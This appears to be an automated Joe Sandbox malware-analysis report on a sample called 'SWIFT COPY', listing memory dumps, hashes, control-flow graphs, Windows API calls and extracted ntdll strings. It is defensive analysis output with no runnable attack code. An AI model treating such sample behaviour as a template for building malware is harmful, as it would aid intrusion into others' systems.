                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c7b38cbbd30b9c5a9cf0eb0b1bfed2718c708e4dd797da979bb2c5d7cb96d94
                                                                                              • Instruction ID: 78e6999e2b84e8d611c4e6b971d821db6c56b7f0ac64103b6792065b1a57a120
                                                                                              • Opcode Fuzzy Hash: 4c7b38cbbd30b9c5a9cf0eb0b1bfed2718c708e4dd797da979bb2c5d7cb96d94
                                                                                              • Instruction Fuzzy Hash: 5141F6B0E0520ADFCB44CFAAC5815AEFBF2EF88340F24D56AD815B7214D7349A418BA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 550a4b9fee5c29de8548eced29bc0e4b9968948e9bd5d7f6cdcd8fc61dd792f2
                                                                                              • Instruction ID: b1c4bce3d9a8273cbc4928303bd445966b13f088b112b94d3b59a7d64149b5bd
                                                                                              • Opcode Fuzzy Hash: 550a4b9fee5c29de8548eced29bc0e4b9968948e9bd5d7f6cdcd8fc61dd792f2
                                                                                              • Instruction Fuzzy Hash: 84411CB0E0A60ADFCB44CFA6D5416AEFBF1EF89340F20986AC415B7264E77497418B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 12c3cda78dc7c9f09b9833b5e44dab186e61ff40b238a57e34cf90e8315b0c98
                                                                                              • Instruction ID: 0d5ab40326faa0fdd35b2a362ceaf32d55f88fbc18c9683fc0ae533fccaa1009
                                                                                              • Opcode Fuzzy Hash: 12c3cda78dc7c9f09b9833b5e44dab186e61ff40b238a57e34cf90e8315b0c98
                                                                                              • Instruction Fuzzy Hash: D131C4B7F941168BCB44CE9AC5855AEFBB5EB4A300B61842B9D45EB350D270E902CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.2%
                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                              Signature Coverage:8.3%
                                                                                              Total number of Nodes:132
                                                                                              Total number of Limit Nodes:10

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 536 417813-41783c call 42f3b3 539 417842-417850 call 42f9b3 536->539 540 41783e-417841 536->540 543 417860-417871 call 42de53 539->543 544 417852-41785d call 42fc53 539->544 549 417873-417887 LdrLoadDll 543->549 550 41788a-41788d 543->550 544->543 549->550
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              APIs
                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C774
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 132 414119-414120 133 414122-414129 132->133 134 4140a6-4140b4 132->134 137 41412b-41412f 133->137 135 4140ba-4140f1 call 4044f3 call 424f53 134->135 136 4140b5 call 417813 134->136 149 414113-414118 135->149 150 4140f3-414104 PostThreadMessageW 135->150 136->135 139 414131-414136 137->139 140 41414d-414153 137->140 139->140 142 414138-41413d 139->142 140->137 143 414155-414158 140->143 142->140 145 41413f-414146 142->145 147 414159-41415c 145->147 148 414148-41414b 145->148 148->140 148->147 150->149 151 414106-414110 150->151 151->149
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 152 41406f-414070 153 414072-41407a 152->153 154 41408f-4140f1 call 42e873 call 42f283 call 417813 call 4044f3 call 424f53 152->154 165 414113-414118 154->165 166 4140f3-414104 PostThreadMessageW 154->166 166->165 167 414106-414110 166->167 167->165
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 168 41407c-414093 170 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 168->170 171 414097 call 42e873 168->171 180 414113-414118 170->180 181 4140f3-414104 PostThreadMessageW 170->181 171->170 181->180 182 414106-414110 181->182 182->180
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 183 414083-414093 184 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 183->184 185 414097 call 42e873 183->185 194 414113-414118 184->194 195 4140f3-414104 PostThreadMessageW 184->195 185->184 195->194 196 414106-414110 195->196 196->194
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 472 41794b-41794d 474 417879-417887 LdrLoadDll 472->474 475 4178df-417907 472->475 478 41788a-41788d 474->478 476 417980-417982 475->476 477 417909-417927 475->477 480 417983 476->480 479 417929-41792c 477->479 481 4179a1-4179ce call 42f413 call 42b7b3 479->481 482 41792e 479->482 482->480 484 417930 482->484 486 417932-417945 484->486 486->486 488 417947 486->488 488->479 490 417949-41794a 488->490 490->472
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID: &cE}
                                                                                              • API String ID: 2234796835-1295445062

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 491 42ca93-42cad1 call 404583 call 42d943 RtlFreeHeap
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CACC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID: neA
                                                                                              • API String ID: 3298025750-2757349852

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 552 42ca53-42ca91 call 404583 call 42d943 RtlAllocateHeap
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,0041E604,?,?,00000000,?,0041E604,?,?,?), ref: 0042CA8C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,53EC9B57,?,?,53EC9B57), ref: 0042CB07
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2160512332
                                                                                              Strings
                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013A540A, 013A5496, 013A5519
                                                                                              • Invalid debug info address of this critical section, xrefs: 013A54B6
                                                                                              • Thread identifier, xrefs: 013A553A
                                                                                              • Critical section address, xrefs: 013A5425, 013A54BC, 013A5534
                                                                                              • double initialized or corrupted critical section, xrefs: 013A5508
                                                                                              • Critical section address., xrefs: 013A5502
                                                                                              • corrupted critical section, xrefs: 013A54C2
                                                                                              • undeleted critical section in freed memory, xrefs: 013A542B
                                                                                              • Address of the debug info found in the active list., xrefs: 013A54AE, 013A54FA
                                                                                              • 8, xrefs: 013A52E3
                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 013A5543
                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013A54CE
                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013A54E2
                                                                                              • Critical section debug info address, xrefs: 013A541F, 013A552E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                              • API String ID: 0-2368682639
                                                                                              Strings
                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 013A2624
                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013A25EB
                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 013A261F
                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 013A2506
                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 013A2409
                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 013A2498
                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 013A2412
                                                                                              • @, xrefs: 013A259B
                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 013A2602
                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013A22E4
                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013A24C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                              • API String ID: 0-4009184096
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                              • API String ID: 0-2515994595
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$`,$h=$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              • HandleTraces, xrefs: 013B8C8F
                                                                                              • VerifierFlags, xrefs: 013B8C50
                                                                                              • VerifierDebug, xrefs: 013B8CA5
                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 013B8A67
                                                                                              • VerifierDlls, xrefs: 013B8CBD
                                                                                              • `,, xrefs: 013B8A35, 013B8A5F
                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 013B8B8F
                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 013B8A3D
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$`,
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$`,$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                              Strings
                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 013A2160, 013A219A, 013A21BA
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013A21BF
                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 013A219F
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 013A2165
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 013A2180
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 013A2178
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013A8181, 013A81F5
                                                                                              • LdrpInitializeImportRedirection, xrefs: 013A8177, 013A81EB
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0136C6C3
                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 013A81E5
                                                                                              • LdrpInitializeProcess, xrefs: 0136C6C4
                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 013A8170
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                              APIs
                                                                                                • Part of subcall function 01372DF0: LdrInitializeThunk.NTDLL ref: 01372DFA
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370BA3
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370BB6
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370D60
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370D74
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                              • String ID:
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01368421
                                                                                              • @, xrefs: 01368591
                                                                                              • LdrpInitializeProcess, xrefs: 01368422
                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0136855E
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013A21D9, 013A22B1
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013A22B6
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 013A21DE
                                                                                              • .Local, xrefs: 013628D8
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                              Strings
                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0139106B
                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013910AE
                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01391028
                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01390FE5
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                              Strings
                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0139A992
                                                                                              • apphelp.dll, xrefs: 01352462
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0139A9A2
                                                                                              • LdrpDynamicShimModule, xrefs: 0139A998
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-176724104
                                                                                              Strings
                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 013B20F3
                                                                                              • LdrpInitializationFailure, xrefs: 013B20FA
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013B2104
                                                                                              • `,, xrefs: 013B20EB
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$`,$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1034781813
                                                                                              Strings
                                                                                              • HEAP[%wZ]: , xrefs: 01343255
                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0134327D
                                                                                              • HEAP: , xrefs: 01343264
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                              • API String ID: 0-617086771
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-4253913091
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $@
                                                                                              • API String ID: 0-1077428164
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                              • API String ID: 0-2779062949
                                                                                              Strings
